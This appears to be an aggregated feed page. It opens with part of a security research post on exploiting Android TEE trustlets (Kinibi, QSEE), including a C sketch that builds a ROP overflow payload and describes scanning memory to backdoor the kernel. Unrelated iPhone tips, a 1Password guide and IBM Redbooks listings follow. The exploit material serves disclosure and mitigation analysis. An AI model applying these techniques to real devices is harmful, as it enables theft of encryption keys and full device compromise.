Lastly, it’s worth mentioning that the stack frames in the trusted application are huge. In fact, they’re so big that there’s no need for a stack pivot in order to fit our ROP chain in memory (which is just as well, as a short search for one yielded no obvious results). Instead, we can simply store our chain on the stack frames leading from the vulnerable function all the way up to “process_cmd”.
Part of the reason for the exorbitantly large stack frames is the fact that most trusted applications do not initialise or use a heap for dynamic memory allocation. Instead, they rely solely on global data structures for stateful storage, and on the large stack for intermediate processing. Using the stack in such a way increases the odds of overflows occurring on the stack (rather than the non-existent heap). Recall that as there’s no stack cookie present, this means that many such issues are trivially exploitable.
Once we’ve finished mapping out the stack layout, we’re more-or-less ready to exploit the issue. All that’s left is to build a stack frame which overwrites the stored LR register to point at the beginning of our ROP chain’s gadgets, followed by a sequence of ROP gadgets needed to prepare arguments and call a function. Once we’re done, we can simply fill the rest of the remaining space with POP-sleds (that is, “POP {PC}” gadgets), until we reach “process_cmd”’s stack frame. Since that last frame restores all non-scratch registers, we don’t have to worry about restoring state either.
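The payload layout described above can be sketched in C. Every constant below (command ID, saved-LR offset, gadget addresses) is invented for illustration; the real values come from reversing the specific trustlet and mcLib binaries.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CMD_UNWRAP     0x07u        /* hypothetical unwrap command ID */
#define LR_OFFSET      64u          /* hypothetical offset of the saved LR */
#define CHAIN_START    0x07D01500u  /* hypothetical first ROP gadget */
#define POP_PC_GADGET  0x07D01234u  /* hypothetical "POP {PC}" sled gadget */

/* Build an input buffer that triggers the overflow and lays out the chain. */
size_t build_payload(uint8_t *out, size_t out_len) {
    if (out_len < LR_OFFSET + 8)
        return 0;
    memset(out, 'A', out_len);              /* filler up to the saved LR */
    uint32_t cmd = CMD_UNWRAP;
    uint32_t token_len = (uint32_t)out_len; /* oversized: triggers the copy */
    memcpy(out, &cmd, 4);                   /* command ID at buffer start */
    memcpy(out + 4, &token_len, 4);         /* unvalidated length field */
    /* Redirect the saved LR into our chain, then fill every word between
     * otp_unwrap's frame and process_cmd's frame with POP {PC} sleds. */
    uint32_t lr = CHAIN_START;
    memcpy(out + LR_OFFSET, &lr, 4);
    for (size_t off = LR_OFFSET + 4; off + 4 <= out_len; off += 4) {
        uint32_t gadget = POP_PC_GADGET;
        memcpy(out + off, &gadget, 4);
    }
    return out_len;
}
```

The little-endian stores match the target’s ARM byte order, so the same buffer can be handed to the command interface as-is.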

You can find the full exploit code here. Note that the code produces a position-independent binary blob which can be injected into a sufficiently privileged process, such as “system_server”.

Security Mitigations
We’ve already seen how a relatively straightforward vulnerability can be exploited within Kinibi’s TEE. Surprisingly, it appeared that there were few mitigations in place holding us back. This is no coincidence. In order to paint a more complete picture, let’s take a moment to assess the security mitigations provided by each TEE. We’ll perform our analysis by executing code within the TEE and exploring it from the vantage point of a trustlet. To do so, we’ll leverage our previously written code-execution exploits for each platform. Namely, this means we’ll explore Kinibi version 310B as present on the Galaxy S7 Edge, and QSEE as present on the Nexus 6.

ASLR

Kinibi offers no form of ASLR. In fact, all trustlets are loaded at a fixed address (denoted in the MCLF header). Moreover, as the trustlets’ base address is quite low (0x1000), this raises the probability of offset-from-NULL dereference issues being exploitable.
Additionally, each trustlet is provided with a common “helper” library (“mcLib”). This library acts as a shim which provides trusted applications with the stubs needed to call each of the functions supported by the TEE’s standard libraries. It contains a wealth of code, including gadgets to call functions, invoke the TEE OS’s syscalls, perform message-passing and much more. And, unfortunately, this library is also mapped at a constant address in the virtual address space of each trustlet (0x7D01000).

Putting these two facts together, any vulnerability found within a trustlet running under Trustonic’s TEE can be exploited without requiring prior information about the address space of the trustlet (thus lowering the bar for remotely exploitable bugs).
So what about Qualcomm’s TEE? Well, QSEE does indeed provide a form of ASLR for all trustlets. However, it is far from ideal - in fact, instead of utilising the entire virtual address space, each trustlet’s VAS simply consists of a flat mapping of a small segment of physical memory into which it is loaded.
Indeed, all QSEE trustlets are loaded into the same small physically contiguous range of memory carved out of the device’s main memory. This region (referred to as the “secapp-region” in the device tree) is dedicated to the TEE, and protected against accesses from the “Normal World” by utilising special security hardware on the SoC. Consequently, the larger the “secapp” region, the less memory is available to the “Normal World”.
The “secapp” region commonly spans around 100MB. Since, as we’ve noted before, each QSEE trustlet’s VAS consists of a flat mapping, the amount of entropy offered by QSEE’s ASLR implementation is limited by the “secapp” region’s size. Therefore, while many devices can theoretically utilise a 64-bit virtual address space (allowing for high-entropy ASLR), the ASLR offered by QSEE is limited to approximately 9 bits (with 355 guesses, an attacker would therefore have a 50% chance of correctly guessing the base address). This is further aided by the fact that whenever an illegal access occurs within the TEE, the TEE OS simply crashes the trustlet, allowing the attacker to reload it and attempt to guess the base address once again.

Stack Cookies and Guard Pages
What about other exploit mitigations? Well, one of the most common mitigations is the inclusion of a stack cookie - a unique value which can be used to detect instances of stack smashing and abort the program’s execution.
Analysing the trustlets present on Samsung’s devices and running under Trustonic’s TEE reveals that no such protection is present. As such, every stack buffer overflow in a trusted application can be trivially exploited by an attacker (as we’ve seen above) to gain code execution. This is in contrast to QSEE, whose trustlets include randomised pointer-sized stack cookies.
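For illustration, here is a toy C model of what the missing mitigation buys. This is not how the real check is produced: compilers emit it via options like -fstack-protector, placing a hidden cookie slot next to the saved registers; the struct below merely simulates that layout, since C makes no guarantees about the relative placement of separate locals.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

static uintptr_t stack_cookie;

/* Pick a random cookie once at startup (real implementations draw this
 * from a proper entropy source, not rand()). */
void cookie_init(void) {
    stack_cookie = ((uintptr_t)rand() << 16) ^ (uintptr_t)rand();
}

int copy_guarded(const uint8_t *in, uint32_t len) {
    struct {
        uint8_t buf[32];
        uintptr_t guard;  /* sits between the buffer and the saved state */
    } frame;
    frame.guard = stack_cookie;
    if (len > sizeof(frame))
        len = sizeof(frame);            /* cap so the demo stays defined */
    memcpy((uint8_t *)&frame, in, len); /* an overflow of buf hits guard first */
    return frame.guard == stack_cookie ? 0 : -1; /* real code would abort() */
}
```

An attacker who overflows the buffer corrupts the cookie before reaching the return address, so the smash is detected before the hijacked return executes; without the cookie (as in Kinibi trustlets), the same overflow proceeds silently.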
Lastly, what about protecting the mutable data segments available to each trustlet - such as the stack, heap and globals? Modern operating systems tend to protect these regions by delimiting them with “guard pages”, thus preventing attackers from using an overflow in one structure in order to corrupt the other.
However, Trustonic’s TEE seems to carve both the globals and the stack out of the trustlet’s data segment, without providing any guard page in between. Furthermore, the stack is located at the end of the data segment, and the global data structures are placed right before it. This layout makes it ideal for an attacker to overflow the stack into the globals, or vice versa.
Similarly, Qualcomm’s TEE does not provide guard pages between the globals, heap and stack - they are all simply carved out of the single data segment provided to the trustlet. As a result, overflows in any of these data structures can be used to corrupt any of the others.

TEEs As A High Value Target
At this point, it is probably clear enough that compromising TEEs on Android is a relatively straightforward task. Since both TEEs lag behind in terms of exploit mitigations, the bar for exploiting vulnerabilities, once found, is rather low.
Additionally, as more and more trusted applications are added, finding a vulnerability in the first place is becoming an increasingly straightforward task. Indeed, simply listing the number of trusted applications on the Galaxy S8, we can see that it contains no fewer than 30 trustlets!

Be that as it may, one might rightly wonder what the possible implications of code-execution within the TEE are. After all, if compromising the TEE does not assist attackers in any way, there may be no reason to further secure it.
To answer this question, we’ll see how compromising the TEE can be an incredibly powerful tool, allowing attackers to fully subvert the system in many cases.
In Qualcomm’s case, one of the system-calls provided by QSEE allows any trustlet to map in physical memory belonging to the “Normal World” as it pleases. As such, this means any compromise of a QSEE trustlet automatically implies a full compromise of Android as well. In fact, such an attack has been demonstrated in the past. Once code execution is gained in the context of a trustlet, it can scan the physical address space for the Linux Kernel, and once found can patch it in memory to introduce a backdoor.
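The scanning step of such an attack can be sketched simply: once a trustlet can map “Normal World” physical memory, locating the kernel reduces to searching the mapped window for a known byte signature. The signature string and the search routine below are placeholders for illustration, not real kernel offsets.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Linear scan of a mapped physical-memory window for a byte signature;
 * returns a pointer to the first match, or NULL if absent. */
const uint8_t *find_signature(const uint8_t *window, size_t window_len,
                              const uint8_t *sig, size_t sig_len) {
    if (sig_len == 0 || window_len < sig_len)
        return NULL;
    for (size_t i = 0; i + sig_len <= window_len; i++)
        if (memcmp(window + i, sig, sig_len) == 0)
            return window + i;  /* candidate kernel location in the window */
    return NULL;
}
```

Having located the kernel this way, the attacker can patch the mapped bytes directly, which is exactly why the map-physical-memory syscall is so dangerous to expose.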
And what of Trustonic’s TEE? Unlike QSEE’s model, trustlets are unable to map-in and modify physical memory. In fact, the security model used by Trustonic ensures that trustlets aren’t capable of doing much at all. Instead, in order to perform any meaningful operation, trustlets must send a request to the appropriate “driver”. This design is conducive to security, as it essentially forces attackers to either compromise the drivers themselves, or find a way to leverage their provided APIs for nefarious means. Moreover, as there aren’t as many drivers as there are trustlets, it would appear that auditing all the drivers in the TEE is indeed feasible.
Although trustlets aren’t granted different sets of “capabilities”, drivers can distinguish between the trusted applications requesting their services by using the caller’s UUID. Essentially, well-written drivers can verify that whichever application consumes their services is contained within a “whitelist”, thus minimising the exposed attack surface.
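Such a per-caller check is conceptually simple. A minimal sketch (the UUID values and function names are invented; real drivers receive the caller’s UUID from the TEE OS):

```c
#include <stdint.h>
#include <string.h>

#define UUID_LEN 16

/* Compare the calling trustlet's 16-byte UUID against a baked-in
 * whitelist before rendering any service. */
int caller_allowed(const uint8_t uuid[UUID_LEN],
                   const uint8_t (*whitelist)[UUID_LEN], int entries) {
    for (int i = 0; i < entries; i++)
        if (memcmp(uuid, whitelist[i], UUID_LEN) == 0)
            return 1;  /* caller is on the whitelist */
    return 0;          /* deny everyone else */
}
```

The check itself is cheap; as we’ll see shortly, the hard part is keeping the whitelist short.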
Sensitive operations, such as mapping-in and modifying physical memory are indeed unavailable to trusted applications. They are, however, available to any driver. As a result, driver authors must be extremely cautious, lest they unintentionally provide a service which can be abused by a trustlet.
Scanning through the drivers provided on Samsung’s Exynos devices, we can see a variety of standard drivers provided by Trustonic, such as the cryptographic driver, the “Trusted UI” driver, and more. However, among these drivers are a few additional drivers authored by Samsung themselves.
One such example is the TIMA driver (UUID FFFFFFFFD0000000000000000000000A), which is used to facilitate Samsung’s TrustZone-based Integrity Measurement Architecture. In short, a component of TIMA performs periodic scans of the kernel’s memory in order to ensure that it is not tampered with.
Samsung has elected to split TIMA’s functionality in two; the driver mentioned above provides the ability to map in physical memory, while an accompanying trusted application consumes these services in order to perform the integrity measurements themselves. In any case, the end result is that the driver provides APIs to both read and write physical memory - a capability which is normally reserved for drivers alone.
Since this functionality could be leveraged by attackers, Samsung has rightly decided to enforce a UUID whitelist in order to prevent access by arbitrary trusted applications. Reversing the driver’s code, we can see that the whitelist of allowed trusted applications is embedded within the driver. Quite surprisingly, however, it is no short list!

Perhaps the take-away here is that having a robust security architecture isn’t helpful unless it is enforced across-the-board. Adding drivers exposing potentially sensitive operations to a large number of trustlets negates these efforts.
Of course, apart from compromising the “Normal World”, the TEE itself holds many pieces of sensitive information which should remain firmly beyond an attacker’s reach. This includes the KeyMaster keys (used for Android’s full disk encryption scheme), DRM content decryption keys (including Widevine) and biometric identifiers.

Afterword
While the motivation behind the inclusion of TEEs in mobile devices is positive, the current implementations are still lacking in many regards. The introduction of new features and the ever increasing number of trustlets result in a dangerous expansion of the TCB. This fact, coupled with the current lack of exploit mitigations in comparison to those offered by modern operating systems, make TEEs a prime target for exploitation.
We’ve also seen that many devices lack support for revocation of trusted applications, or simply fail to do so in practice. As long as this remains the case, flaws in TEEs will be that much more valuable to attackers, as vulnerabilities, once found, compromise the device’s TEE indefinitely.
Lastly, since in many cases TEEs enjoy a privileged vantage point, compromising the TEE may compromise not only the confidentiality of the information processed within it, but also the security of the entire device.

Categories: Security

In the news

iPhone J.D. - Fri, 07/21/2017 - 00:46

Apple updated iOS to version 10.3.3 this week.  You should update your iPhone and iPad for the same reasons I mentioned back when 10.3.2 came out; iOS updates always improve security.  In fact, Ben Lovejoy of 9to5Mac reports that one of the things fixed is the potential ability of a hacker who is close enough to your iPhone to exploit a flaw in the iPhone's Wi-Fi chip and wirelessly gain control of your iPhone.  Yikes!  Glad that one was fixed.  And now, the other news of note from the past week:

  • South Carolina attorney Justin Kahn discusses a recent update to the iAnnotate app (version 4.3) which lets you annotate two documents side-by-side.
  • John Gruber of Daring Fireball explains why you should not manually quit apps in iOS.  Sure, you can do it occasionally if an app is frozen or otherwise isn't working properly, but if you believe that you are saving memory or making your iPhone faster by quitting apps, you are wrong.
  • Jonny Evans of Computerworld shares over 50 iOS 10 tips, and there are some good ones on that list.
  • Cella Lao Rousseau of iMore reviews portable Apple Watch chargers.
  • When I purchased a 2017 Honda Accord earlier this year, I made sure to select CarPlay as an option.  I love CarPlay and I use it every time I drive.  Reese Counts of Autoblog reports that this Fall, Honda will start to sell the 2018 Honda Accord, with Apple CarPlay included in every model and a larger 8" display (up from 7" on the 2017 model).  It will also include a physical knob to control the volume instead of touchscreen volume controls (which can be hard to use).
  • There was a time when I would carry an iPhone, an iPad and an iPad mini all at the same time, but apparently that is nothing.  Ben Lovejoy of 9to5Mac reports that a Chinese customs agent stopped a woman coming in from Hong Kong who had 102 iPhones strapped to her body.  (iPhones are cheaper in Hong Kong than in mainland China.)
  • David Pogue of Yahoo explores the idea of charging an iPhone wirelessly, and interviews the CEO of Energous, a company trying to do this.  The charge would be very slow (a trickle charge), and the technology seems far off, but someday this might actually work.
  • Ryan Christoffel of MacStories reviews the new CARROT Weather app, an app that gives you both the weather forecast and snarky banter.
  • We all like free WiFi, but at what cost?  Rhett Jones of Gizmodo reports that 22,000 people agreed to clean toilets to get WiFi ... because they didn't read the terms of service.
  • And finally, yesterday Apple updated its Clips app to version 1.1.  This first update to Clips adds some neat new features like new posters (an animated background on which you can place text), but the big new feature is the ability to add Disney/Pixar characters to your videos.  Here is an 11 second demo I created at my desk which didn't take much more than 11 seconds to make:

Categories: iPhone Web Sites

Using 1Password for websites with two-factor authentication

iPhone J.D. - Thu, 07/20/2017 - 16:09

A few days ago, 1Password was updated to improve the ability to use 1Password with sites that have a time-based, two-factor authentication code.  This is a useful feature of 1Password.  Here is why I recommend two-factor authentication in general, and how it now works in 1Password on the iPhone or iPad.

Two-factor authentication is good

Two-factor authentication is a way to confirm your identity when you are logging in to a website.  Normally a website asks for your username and password, but your username is often easy for a hacker to learn (it might just be your public email address), and thus all a hacker needs to do is learn your password and he has access to your account with that website.  There are lots of different ways that a hacker could theoretically learn your password — such as if you use the same password at multiple sites (don't do that!) or if you have multiple passwords that are similar and the hacker can guess your pattern (don't do that either!) or if someone looks over your shoulder while you are typing in your password in a public spot (yikes!), etc.  With two-factor authentication, it is not enough for the hacker to have your username and password; he must also have access to a device in your possession (such as your iPhone) which displays a number that changes every 30 seconds.  If the hacker is in some foreign country across the globe, he won't have that, and his attempts to access your account will fail.
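For the curious, those rotating six-digit numbers are standard TOTP codes (RFC 6238): your phone and the website each hash a shared secret together with the current 30-second time step, then shorten the result to six digits. Here is a C sketch of the counter and the RFC 4226 truncation step (the HMAC computation itself is omitted for brevity):

```c
#include <stdint.h>
#include <time.h>

/* The moving factor both sides hash: the Unix time divided into
 * 30-second steps, which is why the code changes every half minute. */
uint64_t totp_counter(time_t now) {
    return (uint64_t)now / 30;
}

/* RFC 4226 dynamic truncation: reduce a 20-byte HMAC-SHA1 digest to the
 * six-digit code shown on screen. */
uint32_t truncate_to_6_digits(const uint8_t hmac[20]) {
    int off = hmac[19] & 0x0f;                       /* low nibble picks offset */
    uint32_t bin = ((uint32_t)(hmac[off] & 0x7f) << 24)
                 | ((uint32_t)hmac[off + 1] << 16)
                 | ((uint32_t)hmac[off + 2] << 8)
                 |  (uint32_t)hmac[off + 3];
    return bin % 1000000;                            /* keep six digits */
}
```

Because both sides run the same computation from the same secret, the code never travels over the network until you type it in, and a stolen code expires within seconds.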

There are many different iPhone apps which can be used to display authentication numbers which change every 30 seconds.  1Password is a good one to use just because you naturally think of that app as a place to store login information.  But with the update this week, 1Password is even better than other apps because it can automatically put the number on your clipboard.  This makes two-factor authentication really fast to use.  And that's good because you get more security without a bottleneck that slows you down.

Here is how you use the feature. 

Configure a 1Password entry to use a one-time password

First, in 1Password, find your entry for the website in question, where you already have your username and password stored.  Tap Edit in the top right corner and scroll down until you see "Add new one-time password."  Tap that and you will see a new entry which has a QR code icon on it.

 

Next, on your computer, go to the website in question.  In this example, I'll use Backblaze, the service I use to automatically backup my home computer.  On the account settings area of the Backblaze website on my computer, I click on the option to turn on two-factor authentication.  The website will then display a big QR code on my computer's monitor.  I tap the QR code icon in 1Password on my iPhone and use my iPhone's camera to scan the QR code.

Now my 1Password entry for Backblaze has a One-Time Password field with a six-digit number which changes every 30 seconds.  There is even a little timer on the right which counts down the seconds so I can see how long I have until the password changes.

Using 1Password with two-factor authentication

Now that the entry for a website has two-factor authentication configured, you can use it the next time that you access that website.  So back to my Backblaze example, whenever I want to access the Backblaze website on my iPhone, I tap the Action button at the bottom of the Safari window, then I select 1Password, I use my Touch ID fingerprint to confirm that I am really me, and then 1Password automatically types my username and my password on the website.

 

Next, the website will ask me for my authentication code, but I don't have to go back to the 1Password app to lookup that code.  Right after 1Password automatically entered my username and password, it pasted the six-digit code to my iPhone clipboard, and it briefly displayed a message that says "One-time password saved to the clipboard."  Thus, all I need to do is tap in the box and select paste, and the number is entered for me.

 

This new system is so much more convenient than having to manually go to another app to find the number and then going back into Safari to enter the number.

Although my focus here is iPhone/iPad, this new 1Password system works the same on your PC and Mac.  Just use 1Password on your computer to enter the username/password, and then use your computer to paste the number when you are asked to enter the six-digit code.  [UPDATE:  To be more clear, the current version of 1Password for Mac automatically copies that code so that it is ready for you to paste, just like iOS.  The current version of 1Password 6 for Windows (version 6.6.439) does not automatically copy the code, but you can right-click on the entry in the browser add-on to manually copy that code and then you can paste it into the Windows browser.  I presume that 1Password for Windows 6 will gain this feature in a future update.]

I currently have two-factor authentication in 1Password configured for Backblaze, Dropbox and Facebook, but I plan to add more websites in the future now that 1Password works so much better with two-factor authentication.

Categories: iPhone Web Sites

IBM Spectrum Accelerate Deployment, Usage, and Maintenance

IBM Redbooks Site - Wed, 07/19/2017 - 09:30
Redbook, published: Wed, 19 Jul 2017

This edition applies to IBM® Spectrum Accelerate V11.5.4.

Categories: Technology

IBM FlashSystem A9000 and A9000R Business Continuity Solutions

IBM Redbooks Site - Wed, 07/19/2017 - 09:30
Redpaper, published: Wed, 19 Jul 2017

IBM® FlashSystem A9000 and IBM FlashSystem® A9000R provide copy functions suited for various data protection scenarios that enable you to enhance your business continuance, disaster recovery, data migration, and backup solutions.

Categories: Technology

Monitoring Overview for IBM Spectrum Scale and IBM Elastic Storage Server

IBM Redbooks Site - Wed, 07/19/2017 - 09:30
Draft Redpaper, last updated: Wed, 19 Jul 2017

IBM® Spectrum Scale is software defined storage for high performance, large scale workloads.

Categories: Technology

IBM Db2: Investigating Automatic Storage Table Spaces and Data Skew

IBM Redbooks Site - Mon, 07/17/2017 - 09:30
Redpaper, published: Mon, 17 Jul 2017

The scope of this IBM® Redpaper™ publication is to provide a high-level overview of automatic storage table spaces, table space maps, table space extent maps, and physically unbalanced data across automatic storage table space containers (that is, data skew).

Categories: Technology

IBM Z Connectivity Handbook

IBM Redbooks Site - Mon, 07/17/2017 - 09:30
Redbook, published: Mon, 17 Jul 2017

This IBM® Redbooks® publication describes the connectivity options that are available for use within and beyond the data center for the IBM Z family of mainframes, which includes these systems:

  • IBM z14
  • IBM z13®
  • IBM z13s™
  • IBM zEnterprise® EC12 (zEC12)
  • IBM zEnterprise BC12 (zBC12)
This book highlights the hardware and software components, functions, typical uses, coexistence, and relative merits of these connectivity features.
Categories: Technology

IBM Z Functional Matrix

IBM Redbooks Site - Mon, 07/17/2017 - 09:30
Redpaper, published: Mon, 17 Jul 2017

This IBM® RedpaperTM publication provides a list of features and functions that are supported on IBM ZTM, including the IBM z14TM(z14), IBM z13TM(z13®), IBM z13sTM(z13s™), IBM zEnterprise® EC12 (zEC12), and IBM zEnterprise BC12 (zBC12).

Categories: Technology

IBM z14 Technical Introduction

IBM Redbooks Site - Mon, 07/17/2017 - 09:30
Redbook, published: Mon, 17 Jul 2017

This IBM® Redpaper Redbooks® publication introduces the latest IBM Z platform, the IBM z14®.

Categories: Technology

New information on your iPhone being searched by Customs at the border

iPhone J.D. - Mon, 07/17/2017 - 01:48

Taking an iPhone or iPad when you leave or enter the United States is a complicated issue for attorneys.  You are likely going to want to do work when you are abroad — especially if you are traveling for business, not pleasure — and thus it makes perfect sense to have your iOS device with you.  In fact, it can be a much better option than a computer, which can be more easily attacked by malware in a foreign country.  If you can get access to WiFi and you use VPN software like Cloak, you should be fairly safe.  The problem, however, is that U.S. customs agents as of late have been demanding to search mobile devices upon reentry into the country, and there are some reports that they will sometimes even copy the data from a device.  If you have confidential attorney-client communications or attorney work product, you don't want a stranger who works as a U.S. customs agent to have unfettered access.

To try to get more concrete information on the current state of affairs, Sen. Ron Wyden, a Democrat from Oregon who has a reputation of being a privacy advocate, recently sent a letter to Acting Commissioner Kevin McAleenan of Customs and Border Protection (CBP) with questions on the current policies.  I encourage you to read the full response as posted by the Washington Post, as well as the article by Brian Fung of the Post, but here are four parts of the response that jumped out at me.

First, CBP does sometimes search electronic devices in the possession of individuals entering the United States, but does so rarely — less than one-hundredth of one percent of travelers.  CBP will inspect devices of both non-citizens and U.S. citizens.

Second, if your device is locked, CBP can ask you to unlock your device so that they can search it.  If you refuse to do so, and if you are a U.S. citizen, CBP will still allow you to enter the country, but you may be delayed (so you may miss your connecting flight) and your device will likely be confiscated.  If you are not a U.S. citizen, failure to unlock your device could be a reason that CBP does not allow you to enter the United States.

Third, CBP takes the position that it has the authority to search anything that is on the device itself.  CBP asserts several justifications for searching devices, and you can probably guess them.  For example, CBP may look for contraband (such as child pornography), or information that could be a threat to national security (such as something related to the proliferation of nuclear weapons).

Fourth, CBP will not ask to access your information on remote servers.  Thus, they should not ask you for your password to Dropbox, Facebook, your law firm, etc.  However, if there is a local copy of any data synced to a remote server — such as local files in the Dropbox app on your iPhone — CBP can look at those documents.

All of this means that if you don't look too suspicious — which unfortunately might be determined based upon the color of your skin or the clothes that you are wearing — there is a very good chance that a customs agent will not ask to look at your phone at all.  My most recent experience with customs was just a few weeks ago when I was in a car and drove across the border to Canada and then drove back again.  The experience of re-entering the U.S. was incredibly quick and non-intrusive for me, just a few questions.  Then again, I was in a van with my wife and kids coming across the border next to Niagara Falls, so it was fairly obvious that we were just typical American tourists.

But if you are unlucky, customs may well ask you to unlock your iPhone or iPad so that they can search through your files.  You need to decide before your travel whether this risk is enough reason to not take your device in the first place.  The Electronic Frontier Foundation prepared an excellent document on this topic called Digital Privacy at the U.S. Border: Protecting the Data On Your Devices and In the Cloud.  According to the EFF, you can ask the border agent to withdraw the order that you unlock your device on the grounds that the device contains confidential and sensitive attorney-client communications and attorney work product.  This might work.  But it might not, and in the process you are going to have to explain to the agent in great detail what is on the device.

The EFF also cites a 2009 directive stating that border agents must consult with the CBP legal office before searching documents protected by the attorney-client privilege.

I wish I could conclude this post with easy answers, but it appears that there are none at the moment.  I don't know how you should weigh the usefulness of having your iPhone and iPad with you outside of the country versus the risk that a border agent will try to search the device as you enter the country.  And remember, we are just talking about U.S. border agents right now; you may also find yourself facing an official in another country who demands access to your device and who has no regard for the Rules of Professional Conduct or the Rules of Evidence governing privilege.

Categories: iPhone Web Sites

IBM z14 Technical Guide

IBM Redbooks Site - Sun, 07/16/2017 - 09:30
Draft Redbook, last updated: Sun, 16 Jul 2017

IBM z14 Technical Guide

Categories: Technology

Essentials of Cloud Application Development on IBM Bluemix

IBM Redbooks Site - Fri, 07/14/2017 - 09:30
Draft Redbook, last updated: Fri, 14 Jul 2017

This IBM® Redbooks® publication is based on the Presentations Guide of the course Essentials of Cloud Application Development on IBM Bluemix that was developed by the IBM Redbooks team in partnership with IBM Skills Academy Program.

Categories: Technology

VersaStack Solution for File Storage using IBM Storwize V5030 and Windows Server 2016

IBM Redbooks Site - Fri, 07/14/2017 - 09:30
Draft Redpaper, last updated: Fri, 14 Jul 2017

This IBM® Redpaper™ publication helps you understand how to implement VersaStack with Windows Server 2016 and IBM Storwize V5030 for file storage.

Categories: Technology

IBM Spectrum Archive Enterprise Edition V1.2.4: Installation and Configuration Guide

IBM Redbooks Site - Fri, 07/14/2017 - 09:30
Draft Redbook, last updated: Fri, 14 Jul 2017

This IBM® Redbooks® publication helps you with the planning, installation, and configuration of the new IBM Spectrum™ Archive (formerly IBM Linear Tape File System™ (LTFS)) Enterprise Edition (EE) V1.2.4.0 for the IBM TS3310, IBM TS3500, and IBM TS4500 tape libraries.

Categories: Technology

In the news

iPhone J.D. - Fri, 07/14/2017 - 00:43

Today at 10am Pacific / 1pm Eastern, legal tech consultant Brett Burney and New Orleans attorney Ernie Svenson are presenting a free webinar called Advanced Mobile Lawyering Tactics.  I have known Brett and Ernie for a long time, and both are excellent presenters and very knowledgeable on mobile technology.  According to a post on Brett's Apps in Law website, topics include:  file management, note taking, scanning documents and working with PDF files, legal research, mind-mapping, and security tips.  If you are in the Central time zone like I am, that means that you can learn some useful tips while you have lunch at your desk at noon.  Click here to register for free.  And now, the news of note from the past week:

  • In an article for Macworld, Jason Snell explains how the new iPad Pro, especially when paired with the upcoming iOS 11, is an amazing device for getting work done.
  • In another article for Macworld, Jeffery Battersby reviews Citrix ShareFile, a service that works on your computer and iOS device.  My law firm uses ShareFile and it works well for sharing large files.
  • In yet another article for Macworld, Glenn Fleishman explains how the ability of apps to track you (even when you want them to) will change in iOS 11.
  • Abhishek Kurve of Cult of Mac explains how, with iOS 11, you will get more free space on your iPhone or iPad.
  • Serenity Caldwell of iMore discusses what will be new when watchOS 4 for the Apple Watch is released later this year.
  • Steven Sande of Apple World Today reviews the iDevices Outdoor Switch, which brings HomeKit control to outdoor lights (and other things that you plug in outside).
  • Jordan Kahn of 9to5Mac reports that the Waze driving app now lets you record custom voice prompts ("turn right," "turn left," etc.) and share them with others.  Finally, you can have your spouse tell you what to do in your car.
  • And finally, Joanna Stern of the Wall Street Journal describes steps you can take — from easy to hard — to fix an old iPhone battery that doesn't do as good a job of holding a charge.

Categories: iPhone Web Sites

Hortonworks Data Platform with IBM Spectrum Scale: Reference Guide for Building an Integrated Solution

IBM Redbooks Site - Wed, 07/12/2017 - 09:30
Redpaper, published: Wed, 12 Jul 2017

This IBM® Redpaper™ publication provides guidance about building an enterprise-grade data lake by using IBM Spectrum™ Scale and Hortonworks Data Platform for performing in-place Hadoop or Spark-based analytics.

Categories: Technology

Review: Apple Smart Cover for 12.9" iPad Pro -- now available in leather

iPhone J.D. - Wed, 07/12/2017 - 00:04

On March 2, 2011, Apple introduced the iPad 2, Apple's first attempt to improve upon the iPad.  The iPad 2 itself was nicer because it was faster, thinner, and lighter.  But I was also excited about two new accessories.  First, Apple introduced an HDMI connector, letting you send 1080p video to a TV, and opening the door to higher-quality presentations.  (Having said that, it amazes me that, this many years later, I still encounter VGA more than HDMI when I give presentations using my iPad.)  Second, Apple introduced the Smart Cover, a device that could both protect the screen of the iPad and work as a stand.  Back in 2011, you could get either a polyurethane version for $39 or a leather version for $69.  I opted for the leather version, and I used leather Smart Covers for many years with multiple versions of the iPad and iPad Air.

When Apple came out with the larger 12.9" iPad Pro in the Fall of 2015, I bought a new Smart Cover to accommodate the new size.  I was curious if the extra weight of the 12.9" iPad Pro would make the Smart Cover less stable as a stand, but I was happy to discover that it worked just fine.  However, Apple only released a polyurethane version of the Smart Cover for the 12.9" iPad Pro.  Last month, when Apple released the second generation of the 12.9" iPad Pro, Apple also introduced the first 12.9" version of the leather Smart Cover.  So you can now choose between a 12.9" polyurethane version for $59 or a 12.9" leather version for $79.  (Both versions work with the first-generation and second-generation 12.9" iPad Pro.)  Here are my thoughts if you are trying to decide between the two.

Smart Covers are a great idea

Smart Covers have been around for so many years that I suspect most of you have owned or at least tried one by now.  But for the sake of completeness, I will start by briefly noting why I like the Smart Cover so much as an iPad accessory.

First, it protects the screen.  The glass on the iPad is pretty strong and scratch-resistant anyway, but with a Smart Cover you never need to worry about a sharp object damaging the screen.  I also find that it makes the iPad easier to grip when carrying it, which provides further protection because I am less likely to drop my iPad.

Second, it gets out of the way when you don't need it.  The genius of the Smart Cover is that it uses magnets built into the side of an iPad.  Thus, it is easy to attach to the iPad, and easy to remove.  When I am using my iPad at work at my desk, I typically don't have the Smart Cover attached.  But whenever I pick up my iPad to take it to a meeting or another attorney's office, I always quickly attach it.

Third, it folds into a stand, in two different positions — one that keeps the iPad more flat with a slight rise in the back, great for using the Pencil or on-screen keyboard:

And one that keeps the iPad more upright, perfect for when you are looking at the screen more than touching it:

When I want my iPad upright for a more extended period of time, I actually prefer to use a dedicated stand to prop up my iPad so that I never have to worry about the iPad falling down, even if I push hard on the screen.  And for over a year now, I've been incredibly happy with the Simplex Tablet iPad Stand by Thought Out which I reviewed in 2016.  That device is only $30 and it is incredibly strong, and makes it easy to have my iPad propped up next to my computer so that I can use both at the same time.  But the Simplex is heavy enough that I only rarely move it outside of my office.  With the Smart Cover, I always have a stand with me, wherever I am, with no noticeable extra weight.

Polyurethane vs. Leather

Now you know why I recommend that attorneys get a Smart Cover for an iPad.  The remaining question is which one: polyurethane or leather?  There are some differences, and the leather version is not always better even though it costs $20 more.

Strength.  As I noted above, back in 2015, I was worried that the extra weight of the larger 12.9" version of the iPad would make the Smart Cover less capable as a stand.  With the polyurethane version, that has not been a problem at all.  But the leather version, for some reason, is not quite as strong when I have the iPad in the more fully upright position.  Every time I did a side-by-side test, with the leather Smart Cover in stand mode on one of my 12.9" iPad Pros and the polyurethane on the other one, as I applied gradually more pressure to both iPads, the leather Smart Cover would always collapse before the polyurethane version.

